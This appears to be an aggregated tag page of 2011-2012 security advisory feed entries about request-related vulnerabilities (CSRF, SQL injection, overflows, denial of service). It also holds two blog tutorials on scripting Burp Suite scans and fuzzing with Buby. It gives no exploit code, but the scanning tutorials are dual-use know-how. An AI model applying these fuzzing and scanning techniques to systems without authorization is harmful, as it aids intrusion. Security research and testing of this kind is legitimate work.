request

177 items tagged "request"

Related tags: vulnerabilities [+], openldap [+], modrdn [+], tomcat [+], samba [+], forgery [+], wolf cms [+], system [+], scsi [+], request system [+], privilege escalation vulnerability [+], local privilege escalation [+], linux security [+], linux [+], kernel [+], escalation [+], cms [+], site [+], sql [+], slow [+], lighttpd [+], information disclosure vulnerability [+], http [+], denial [+], buffer overflow [+], based buffer overflow [+], arbitrary html [+], andx [+], cross [+], vino [+], request object [+], object security [+], mdvsa [+], mandriva linux [+], framebuffer [+], blog [+], authdata [+], attacker [+], active directory client [+], wolf [+], whcms [+], tftp [+], system versions [+], system 1 [+], stack buffer [+], stable [+], remote buffer overflow vulnerability [+], remote buffer overflow [+], put [+], processor object [+], planeshift [+], php nuke [+], pandora fms [+], pandora [+], page versions [+], outofmemoryerror [+], mongoose [+], metasploit [+], manager pro [+], information [+], inclusion [+], idev [+], gui [+], groupoffice [+], fms [+], cve [+], csrf [+], ariadne [+], archiva [+], alpha cross [+], alpha [+], admin privileges [+], a.m.y. cross [+], a.m.y [+], vulnerability [+], denial of service [+], version 6 [+], validation routine [+], uri [+], update [+], ubuntu [+], tracker [+], takeover [+], stack overflow [+], sql commands [+], snmp [+], session setup [+], server [+], sending [+], security [+], rra [+], revs [+], request tracker [+], request header [+], request function [+], request body [+], reply function [+], proof of concept [+], overflow [+], ovalarm [+], network node manager [+], nbsp [+], microsoft iis [+], microsoft [+], liferay [+], internal server error [+], iis [+], get [+], evocam [+], cross site [+], corporate desktop [+], continuum [+], cktricky [+], body [+], beta [+], arbitrary code execution [+], apache http server [+], ajp [+], General [+], zdi [+], x.x.x [+], webdav [+], web interface [+], vault [+], usa [+], txt [+], turns [+], tom gallagher [+], surprise [+], submissions [+], stylesheet [+], squirrelmail [+], simple request [+], server connection [+], sendto [+], security vulnerabilities [+], safer use [+], rpc request [+], rpc [+], request line [+], refund request [+], refund [+], reading [+], qzocxoo [+], quot [+], quicksilver [+], propfind [+], procheckup [+], preventing [+], password [+], passive scan [+], oracle database [+], oracle [+], opens [+], multiple [+], multicart [+], message [+], malformed request [+], lotus domino [+], lotus [+], line [+], lan [+], juniper ive [+], juniper [+], jboss [+], java web start [+], interbase [+], ibm [+], https [+], hack [+], gwt [+], google [+], global object [+], gateway ip [+], fuzz [+], foi [+], feds [+], example script [+], embarcadero [+], domino icalendar [+], destination port [+], d2d [+], credentials [+], code execution [+], bugtraq [+], black hat [+], backtracks [+], background job [+], authentication request [+], authentication [+], atheros ar5005g [+], active scan [+], ability [+], Wireless [+], Support [+], Soporte [+], Pentesting [+], Forums [+], Discussion [+], BackTrack [+], apache [+], service vulnerability [+], cross site scripting [+], buffer overflow vulnerability [+], linux kernel [+], apache tomcat [+]

May 24, 2012
0:00
Vuln: Request Tracker Multiple Security Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Request Tracker Multiple Security Vulnerabilities
Tags: multiple request tracker request-tracker security-vulnerabilities
May 23, 2012
0:00
Vuln: Net-SNMP SNMP GET Request Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Net-SNMP SNMP GET Request Denial of Service Vulnerability
Tags: request denial snmp service-vulnerability denial-of-service
May 22, 2012
0:00
Vuln: Apache Tomcat Request Object Security Bypass Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apache Tomcat Request Object Security Bypass Vulnerability
Tags: request tomcat apache apache-tomcat object-security request-object
May 18, 2012
9:00
Bugtraq: Re: [oss-security] CVE Request: Planeshift buffer overflow
» ‎ SecurityFocus Vulnerabilities

Re: [oss-security] CVE Request: Planeshift buffer overflow
Tags: cve request planeshift buffer-overflow
8:08
Bugtraq: Re: [oss-security] CVE Request: Planeshift buffer overflow
» ‎ SecurityFocus Vulnerabilities

Re: [oss-security] CVE Request: Planeshift buffer overflow
Tags: cve request planeshift buffer-overflow
8:00
Bugtraq: Re: [oss-security] CVE Request: Planeshift buffer overflow
» ‎ SecurityFocus Vulnerabilities

Re: [oss-security] CVE Request: Planeshift buffer overflow
Tags: cve request planeshift buffer-overflow
May 15, 2012
0:00
Vuln: Net-SNMP SNMP GET Request Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Net-SNMP SNMP GET Request Denial of Service Vulnerability
Tags: request denial snmp service-vulnerability denial-of-service
April 20, 2012
13:04
Bugtraq: Specially crafted webdav request allows reading of local files on liferay 6.0.x
» ‎ SecurityFocus Vulnerabilities

Specially crafted webdav request allows reading of local files on liferay 6.0.x
Tags: request webdav reading

12:59
Liferay JSON Request Control Takeover
» ‎ Packet Storm Security Recent Files

Liferay Portal suffers from a takeover vulnerability due to a single HTTP request allowing an attacker to reconfigure which memcached to use. Proof of concept code included. Version 6.1 ce is confirmed vulnerable.
Tags: request takeover liferay proof-of-concept attacker version-6

12:59
Liferay JSON Request Control Takeover
» ‎ Packet Storm Security Misc. Files

Liferay Portal suffers from a takeover vulnerability due to a single HTTP request allowing an attacker to reconfigure which memcached to use. Proof of concept code included. Version 6.1 ce is confirmed vulnerable.
Tags: request takeover liferay proof-of-concept attacker version-6

April 04, 2012
17:28
idev-Payments 1.0 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

idev-Payments version 1.0 suffers from a cross site request forgery vulnerability.
Tags: cross request site forgery idev vulnerability

17:28
idev-Payments 1.0 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

idev-Payments version 1.0 suffers from a cross site request forgery vulnerability.
Tags: cross request site forgery idev vulnerability

17:28
idev-Payments 1.0 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

idev-Payments version 1.0 suffers from a cross site request forgery vulnerability.
Tags: cross request site forgery idev vulnerability

March 23, 2012
0:00
Vuln: Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow
March 16, 2012
0:00
Vuln: Apache Tomcat Request Object Security Bypass Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apache Tomcat Request Object Security Bypass Vulnerability
Tags: request tomcat apache apache-tomcat object-security request-object

March 11, 2012
8:22
A.M.Y. Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

A.M.Y. suffers from a cross site request forgery vulnerability.
Tags: request forgery site a.m.y.-cross a.m.y vulnerability

8:22
A.M.Y. Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

A.M.Y. suffers from a cross site request forgery vulnerability.
Tags: request forgery site a.m.y.-cross a.m.y vulnerability

8:22
A.M.Y. Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

A.M.Y. suffers from a cross site request forgery vulnerability.
Tags: request forgery site a.m.y.-cross a.m.y vulnerability

7:44
Ad Manager Pro Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Ad Manager Pro suffers from a cross site request forgery vulnerability.
Tags: cross request site manager-pro forgery vulnerability

7:44
Ad Manager Pro Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Ad Manager Pro suffers from a cross site request forgery vulnerability.
Tags: cross request site manager-pro forgery vulnerability

7:44
Ad Manager Pro Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Ad Manager Pro suffers from a cross site request forgery vulnerability.
Tags: cross request site manager-pro forgery vulnerability

February 29, 2012
0:00
Vuln: Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow
February 24, 2012
0:00
Vuln: Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow
February 23, 2012
0:00
Vuln: Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow
February 22, 2012
0:00
Vuln: Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Samba 'AndX' Request CVE-2012-0870 Heap Based Buffer Overflow Vulnerability
Tags: andx request samba buffer-overflow-vulnerability based-buffer-overflow

February 15, 2012
19:10
11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion
» ‎ Packet Storm Security Exploits

11in1 version 1.2.1 stable 12-31-2011 suffers from cross site request forgery and local file inclusion vulnerabilities.
Tags: cross request site forgery inclusion stable

19:10
11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion
» ‎ Packet Storm Security Recent Files

11in1 version 1.2.1 stable 12-31-2011 suffers from cross site request forgery and local file inclusion vulnerabilities.
Tags: cross request site forgery inclusion stable

19:10
11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion
» ‎ Packet Storm Security Misc. Files

11in1 version 1.2.1 stable 12-31-2011 suffers from cross site request forgery and local file inclusion vulnerabilities.
Tags: cross request site forgery inclusion stable

0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation
February 13, 2012
0:00
Vuln: Apache Tomcat Request Object Security Bypass Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apache Tomcat Request Object Security Bypass Vulnerability
Tags: request tomcat apache apache-tomcat object-security request-object
February 09, 2012
0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation
February 06, 2012
0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation
February 02, 2012
0:00
Vuln: Apache Tomcat Request Object Security Bypass Vulnerability
» ‎ SecurityFocus Vulnerabilities

Apache Tomcat Request Object Security Bypass Vulnerability
Tags: request tomcat apache apache-tomcat object-security request-object
January 25, 2012
9:00
Bugtraq: CSRF (Cross-Site Request Forgery) in DClassifieds
» ‎ SecurityFocus Vulnerabilities

CSRF (Cross-Site Request Forgery) in DClassifieds
Tags: request csrf site forgery
0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation

January 23, 2012
20:59
DirectAdmin Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

DirectAdmin add sub domain cross site request forgery exploit.
Tags: cross request site forgery

20:59
DirectAdmin Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

DirectAdmin add sub domain cross site request forgery exploit.
Tags: cross request site forgery

20:59
DirectAdmin Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

DirectAdmin add sub domain cross site request forgery exploit.
Tags: cross request site forgery

January 17, 2012
16:26
Apache Tomcat Request Information Disclosure
» ‎ Packet Storm Security Advisories

Apache Tomcat versions 7.0.0 through 7.0.21 and 6.0.30 through 6.0.33 suffer from an information disclosure vulnerability. For performance reasons, information parsed from a request is often cached in two places: the internal request object and the internal processor object. These objects are not recycled at exactly the same time. When certain errors occur that needed to be added to the access log, the access logging process triggers the re-population of the request object after it has been recycled. However, the request object was not recycled before being used for the next request. That lead to information leakage (e.g. remote IP address, HTTP headers) from the previous request to the next request.
Tags: request apache information information-disclosure-vulnerability apache-tomcat processor-object

16:26
Apache Tomcat Request Information Disclosure
» ‎ Packet Storm Security Recent Files

Apache Tomcat versions 7.0.0 through 7.0.21 and 6.0.30 through 6.0.33 suffer from an information disclosure vulnerability. For performance reasons, information parsed from a request is often cached in two places: the internal request object and the internal processor object. These objects are not recycled at exactly the same time. When certain errors occur that needed to be added to the access log, the access logging process triggers the re-population of the request object after it has been recycled. However, the request object was not recycled before being used for the next request. That lead to information leakage (e.g. remote IP address, HTTP headers) from the previous request to the next request.
Tags: request apache information information-disclosure-vulnerability apache-tomcat processor-object

16:26
Apache Tomcat Request Information Disclosure
» ‎ Packet Storm Security Misc. Files

Apache Tomcat versions 7.0.0 through 7.0.21 and 6.0.30 through 6.0.33 suffer from an information disclosure vulnerability. For performance reasons, information parsed from a request is often cached in two places: the internal request object and the internal processor object. These objects are not recycled at exactly the same time. When certain errors occur that needed to be added to the access log, the access logging process triggers the re-population of the request object after it has been recycled. However, the request object was not recycled before being used for the next request. That lead to information leakage (e.g. remote IP address, HTTP headers) from the previous request to the next request.
Tags: request apache information information-disclosure-vulnerability apache-tomcat processor-object

January 06, 2012
4:19
[Slides] Finding and Preventing Cross-site request Forgery
» ‎ SecDocs

Authors: Tom Gallagher
Tags: CSRF
Event: Black Hat USA 2006

Tags: preventing cross-site request tom-gallagher usa black-hat forgery

January 04, 2012
0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation
January 03, 2012
0:00
Vuln: Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel 'SG_IO IOCTL' SCSI Request Local Privilege Escalation Vulnerability
Tags: escalation request scsi privilege-escalation-vulnerability linux-kernel local-privilege-escalation

December 12, 2011
18:18
FOI Request Turns Up Carrier IQ Surprise
» ‎ Packet Storm Security Headlines

FOI Request Turns Up Carrier IQ Surprise
Tags: foi request turns surprise

December 11, 2011
15:46
Pixie 1.04 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Pixie version 1.04 suffers from a blog post cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability blog

15:46
Pixie 1.04 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Pixie version 1.04 suffers from a blog post cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability blog

15:46
Pixie 1.04 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Pixie version 1.04 suffers from a blog post cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability blog

December 02, 2011
0:00
Vuln: JBoss AS Administration Cross Site Request Forgery Vulnerability
» ‎ SecurityFocus Vulnerabilities

JBoss AS Administration Cross Site Request Forgery Vulnerability
Tags: request site jboss forgery vulnerability
October 27, 2011
0:00
Vuln: Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
Tags: request vino framebuffer denial-of-service

October 10, 2011
17:39
6kbbs Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Exploits

6kbbs suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

17:39
6kbbs Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Recent Files

6kbbs suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

17:39
6kbbs Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

6kbbs suffers from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

September 20, 2011
0:00
Vuln: iScripts MultiCart 'refund_request.php' SQL Injection Vulnerability
» ‎ SecurityFocus Vulnerabilities

iScripts MultiCart 'refund_request.php' SQL Injection Vulnerability
Tags: multicart request refund refund-request vulnerability

September 08, 2011
7:32
AM4SS 1.2 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

AM4SS version 1.2 add administrator cross site request forgery exploit.
Tags: cross request site forgery

7:32
AM4SS 1.2 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

AM4SS version 1.2 add administrator cross site request forgery exploit.
Tags: cross request site forgery

7:32
AM4SS 1.2 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

AM4SS version 1.2 add administrator cross site request forgery exploit.
Tags: cross request site forgery

September 07, 2011
0:00
Vuln: Mongoose PUT Request Remote Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Mongoose PUT Request Remote Buffer Overflow Vulnerability
Tags: put mongoose request buffer-overflow-vulnerability remote-buffer-overflow-vulnerability remote-buffer-overflow

September 02, 2011
14:21
Help Request System 1.1a SQL Injection
» ‎ Packet Storm Security Advisories

Help Request System versions 1.1a and below suffer from a remote SQL injection vulnerability.
Tags: system request sql request-system system-versions system-1

14:21
Help Request System 1.1a SQL Injection
» ‎ Packet Storm Security Recent Files

Help Request System versions 1.1a and below suffer from a remote SQL injection vulnerability.
Tags: system request sql request-system system-versions system-1

14:21
Help Request System 1.1a SQL Injection
» ‎ Packet Storm Security Misc. Files

Help Request System versions 1.1a and below suffer from a remote SQL injection vulnerability.
Tags: system request sql request-system system-versions system-1

August 30, 2011
0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service

August 24, 2011
7:15
Help Request System 1.1g Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Help Request System version 1.1g suffers from a cross site request forgery vulnerability.
Tags: system cross request request-system forgery vulnerability

7:15
Help Request System 1.1g Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Help Request System version 1.1g suffers from a cross site request forgery vulnerability.
Tags: system cross request request-system forgery vulnerability

7:15
Help Request System 1.1g Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Help Request System version 1.1g suffers from a cross site request forgery vulnerability.
Tags: system cross request request-system forgery vulnerability

August 12, 2011
0:00
Vuln: Mongoose PUT Request Remote Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Mongoose PUT Request Remote Buffer Overflow Vulnerability
Tags: put mongoose request buffer-overflow-vulnerability remote-buffer-overflow-vulnerability remote-buffer-overflow
August 10, 2011
0:00
Vuln: Mongoose PUT Request Remote Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

Mongoose PUT Request Remote Buffer Overflow Vulnerability
Tags: put mongoose request buffer-overflow-vulnerability remote-buffer-overflow-vulnerability remote-buffer-overflow
July 26, 2011
12:00
Bugtraq: Re: CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials
» ‎ SecurityFocus Vulnerabilities

Re: CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials
Tags: request gwt rpc rpc-request d2d credentials
0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service
July 20, 2011
0:00
Vuln: IBM Lotus Domino iCalendar Meeting Request Parsing Remote Stack Buffer Overflow Vulnerability
» ‎ SecurityFocus Vulnerabilities

IBM Lotus Domino iCalendar Meeting Request Parsing Remote Stack Buffer Overflow Vulnerability
Tags: request lotus ibm domino-icalendar buffer-overflow-vulnerability lotus-domino stack-buffer

July 12, 2011
17:53
Pandora FMS 3.2.1 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Pandora FMS versions 3.2.1 and below suffer from a cross site request forgery vulnerability.
Tags: cross request site pandora-fms fms forgery pandora

17:53
Pandora FMS 3.2.1 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Pandora FMS versions 3.2.1 and below suffer from a cross site request forgery vulnerability.
Tags: cross request site pandora-fms fms forgery pandora

17:53
Pandora FMS 3.2.1 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Pandora FMS versions 3.2.1 and below suffer from a cross site request forgery vulnerability.
Tags: cross request site pandora-fms fms forgery pandora

June 15, 2011
5:29
LulzSec Opens Hack Request Line
» ‎ Packet Storm Security Headlines

LulzSec Opens Hack Request Line
Tags: request opens request-line hack

June 10, 2011
0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service

May 28, 2011
10:52
Cotonti 0.9.2 Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Exploits

Cotonti versions 0.9.2 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

10:52
Cotonti 0.9.2 Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Recent Files

Cotonti versions 0.9.2 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

10:52
Cotonti 0.9.2 Cross Site Request Forgery / Cross Site Scripting
» ‎ Packet Storm Security Misc. Files

Cotonti versions 0.9.2 and below suffer from cross site request forgery and cross site scripting vulnerabilities.
Tags: cross request site cross-site-scripting forgery

May 19, 2011
0:00
Vuln: Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
Tags: request vino framebuffer denial-of-service

May 18, 2011
20:28
99ko 0.4b Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

99ko versions 0.4b and below suffer from a cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability

20:28
99ko 0.4b Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

99ko versions 0.4b and below suffer from a cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability

20:28
99ko 0.4b Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

99ko versions 0.4b and below suffer from a cross site request forgery vulnerability.
Tags: cross request site forgery vulnerability

May 17, 2011
0:00
Vuln: Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
Tags: request vino framebuffer denial-of-service
May 16, 2011
0:00
Vuln: Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
» ‎ SecurityFocus Vulnerabilities

Vino Framebuffer Request Processing Multiple Remote Denial of Service Vulnerabilities
Tags: request vino framebuffer denial-of-service

May 14, 2011
19:49
Buby Script Basics Part 5
» ‎ Carnal0wnage

√ evt_http_message
√ evt_scan_issue
√ doActiveScan
√ doPassiveScan
√ excludeFromScope
√ includeInScope
√ isInScope
√ issueAlert
√ sendToIntruder
√ sendToRepeater
   sendToSpider
   makeHttpRequest

In this portion of the Buby Script Basics series (Part 5), we will cover all but two of the remaining methods (methods without lines through them) on our checklist.

As always, you can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

The three methods we will cover are issueAlert, sendToIntruder, and sendToRepeater. The example script is called sendto_and_issue_alert.rb and encompasses all three.

The purpose of this script is to check the body of post messages to see if one of the parameters matches our list of interesting parameters (FUZZ_PARAMS) which deserve manual analysis. We'll perform the manual analysis with intruder/repeater and then issue an alert when the request has been sent over.

Unlike the previous tutorials, this script will be ran by invoking the method via the command line.

Example of how to run this script (covered in Part 1 of this series:

$ jruby -S buby -i -B burp_pro.jar -r sendto_and_issue_alert.rb

This script is going to be run against the proxy history, it's going to search the proxy history looking for the interesting requests. After you've interacted with the site type "$burp.run".

If the parameters in the body of the POST message match our interesting params, you should see the following:

Request sent to repeater, notice the name of the tab (it is our fuzz param "Price")

The request has been sent to intruder

Lastly, an alert will appear notifying you that the previously mentioned actions have been taken.

Time to discuss the code that does all this :-)
First we establish parameters that could be interesting to us in terms of performing manual analysis.

This method '$burp.run' is the catalyst for everything that comes next. When the user types $burp.run at the console they are invoking this method.
Line 2 instantiates the proxy_hist object ($burp.get_proxy_history). The fourth line determines if the length is greater than 0. If so, start iterating thru each obj in the get_proxy_history array. Line 7 invokes the hmeth method (passes it the 'obj' object). Line 8 calls extract_str with the result of Line 7 (hmeth...which is the HTTP Method) and the 'obj' object.

The req_meth takes the request_headers, takes the first line and converts it to a string. The '[0..3]' method extracts the first 4 characters of the first line of the request headers. The method returns this value.

Part 1 of extract_str
The extract_str method is where the FUZZ_PARAMS are searched against the request message and sent to repeater/intruder (along with the alert).
The second line splits objs into the http_meth and req objects.
The third line ensures that we do not execute any further code unless the http_meth is a POST method.
Then we instantiate the bparams object as a Hash on line 4.
On line 5, the request_body gets split by the ampersand (so that we break up all the params and their values into key/value pairs (ex: Price=2099.00).
Next, we split these pairs up by the '=' (equal sign) and place each param/value (key/value) into the bparam hash. Conceptually the bparam hash would look like
bparam = {'Price' => '2099.00}
The last line assigns either true or false to the proto object based on whether or not the protocol is https.

Part 2 of extract_str
Here we begin iterating thru each item in the FUZZ_PARAM array. If the bparam hash has as key which matches on of the items in FUZZ_PARAM, we send it to intruder/repeater and issue our alerts.
Explanation of methods:

sendToIntruder(host, port, https, req)
-host
-port
-true/false (for http/https)
-request string

sendToRepeater(host, port, https, req, tab = nil)
-host
-port
-true/false (for http/https)
-request string
-the name of the tab (String value) )

issueAlert(msg)
- Takes only one parameter, a string value. This is what shows up in the alert.

*We will cover the remaining two methods in the next portion of the series. This post turned into a rather long one so it was postponed.

Happy Hacking,

~cktricky
Tags: nbsp line request example-script sendto fuzz cktricky
May 13, 2011
23:13
Buby Script Basics Part 4
» ‎ Carnal0wnage

√ evt_http_message
√ evt_scan_issue
√ doActiveScan
√ doPassiveScan
√ excludeFromScope
√ includeInScope
√ isInScope
   issueAlert
   makeHttpRequest
   sendToIntruder
   sendToRepeater
   sendToSpider

In Part 3 of this series we covered the two methods with lines drawn through them (above: evt_http_message and evt_scan_issue).

In Part 4, the methods with checks next to them will be described along with code examples.

You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

includeInScope, excludeFromScope----------------------------------------------

The code here is nothing more than two arrays. The first array, EXCLUSION_LIST, contains items we'd like to exclude from scope. The second array, INCLUSION_LIST, contains items to include.

This following portion of code contains a PREFIX array (both http and https). We perform an iteration of both and while iterating through this prefix array, we start iterating through a second list (EXCLUSION_LIST) and concatenating the prefix + host + the item in the EXCLUSION_LIST. This step is repeated for the INCLUSION_LIST. The $burp.includeInScope() method is called and we submit the concatenated value (url) to it.

do_active_scan, do_passive_scan, isInScope

----------------------------------------------------

The def $burp.evt_proxy_message is a familiar one at this point in the series so we won't discuss this in detail. The code @@msg = nil exists solely to instantiate a global object called msg. We will need to keep an object associated with the request message (headers/body) because passive scanning requires both a request message and response message.

pre = is_https? 'https' : 'http' is just a way to define the "pre" object based on whether or not it is http or https message.

pre_bool does the same thing as the pre object but instead of http/https it is a true/false.

uri = "#{pre}://#{rhost}:#{rport}#{url}" is just the url (string concatenation).

The last three lines of code here basically set the @@msg value. We only want to do this if it is a request. Remember, we need an object to hold the request message so that even if the current message is a response we can call both the request message and response message.

Next bit of code basically says, if this message is in scope AND is a request message, start performing an active scan. Otherwise if it is a message which is in scope but a response message then perform passive scanning.

$burp.do_active_scan takes 4 objects
-rhost => host value
-rport => port value
-pre_bool => true/false based on whether or not it is https
-message => String value (or Java bytes), full message (request only of course)

$burp.do_passive_scan takes 5 objects

-rhost => host value-rport => port value-pre_bool => true/false based on whether or not it is https

-@@msg => request message, string value (or Java bytes)
-message => response message, string value (or Java bytes)

Okay, next up is Part 5 of this series where we will cover the rest of the methods listed above.

Happy Hacking,

~cktricky

Tags: nbsp request message passive-scan global-object active-scan cktricky

May 10, 2011
11:46
Wolf CMS 0.7.5 Cross Site Request Forgery
» ‎ Packet Storm Security Exploits

Wolf CMS version 0.7.5 suffers from multiple cross site request forgery vulnerabilities.
Tags: cross request site wolf-cms forgery cms wolf

11:46
Wolf CMS 0.7.5 Cross Site Request Forgery
» ‎ Packet Storm Security Recent Files

Wolf CMS version 0.7.5 suffers from multiple cross site request forgery vulnerabilities.
Tags: cross request site wolf-cms forgery cms wolf

11:46
Wolf CMS 0.7.5 Cross Site Request Forgery
» ‎ Packet Storm Security Misc. Files

Wolf CMS version 0.7.5 suffers from multiple cross site request forgery vulnerabilities.
Tags: cross request site wolf-cms forgery cms wolf

0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service
May 05, 2011
0:00
Vuln: Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
» ‎ SecurityFocus Vulnerabilities

Linux Kernel Request Handling 'cm.c' Denial of Service Vulnerability
Tags: request kernel linux service-vulnerability linux-kernel denial-of-service
April 29, 2011
14:01
Bugtraq: ZDI-11-153: Embarcadero Interbase connect Request Parsing Remote Code Execution Vulnerability
» ‎ SecurityFocus Vulnerabilities

ZDI-11-153: Embarcadero Interbase connect Request Parsing Remote Code Execution Vulnerability
Tags: embarcadero interbase request code-execution zdi
April 28, 2011
